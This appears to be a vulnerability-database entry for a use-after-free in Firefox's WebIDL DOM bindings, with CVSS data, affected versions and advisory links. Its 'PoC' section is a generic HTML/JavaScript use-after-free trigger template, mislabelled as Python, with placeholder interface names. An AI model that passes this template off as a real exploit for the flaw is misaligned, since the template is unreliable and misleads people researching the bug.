Security Vulnerability Report
中文
CVE-2026-8947 CVSS 7.3 HIGH

CVE-2026-8947

Published: 2026-05-19 14:16:51
Last Modified: 2026-05-19 15:16:34

Description

Use-after-free in the DOM: Bindings (WebIDL) component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, and Firefox ESR 140.11.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Firefox < 151
Firefox ESR < 115.36
Firefox ESR < 140.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC Concept for CVE-2026-8947 (WebIDL Use-After-Free) This script attempts to trigger a UAF condition in the DOM Bindings. --> <html> <body> <script> function trigger_uaf() { // 1. Create a target DOM element that interacts with WebIDL let target = document.createElement('div'); document.body.appendChild(target); // 2. Create a reference to the WebIDL proxy object // (Vulnerability context: specific binding interface) let webidl_ref = target.someWebIDLInterface; // 3. Remove the element from the DOM, triggering potential free if ref count is mishandled document.body.removeChild(target); // 4. Force Garbage Collection to attempt to reclaim the memory // Note: In a real browser exploit scenario, this requires specific heap grooming if (window.gc) { window.gc(); } // 5. Attempt to use the dangling pointer // If vulnerable, this accesses freed memory leading to crash or code execution try { webidl_ref.vulnerableMethod(); console.log("Exploit failed: Vulnerability not triggered."); } catch (e) { console.log("Exception occurred: " + e.message); } } // Run the trigger trigger_uaf(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8947", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:50.910", "lastModified": "2026-05-19T15:16:33.683", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use-after-free in the DOM: Bindings (WebIDL) component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, and Firefox ESR 140.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2038439", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-47/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-48/", "source": "[email protected]"}]}}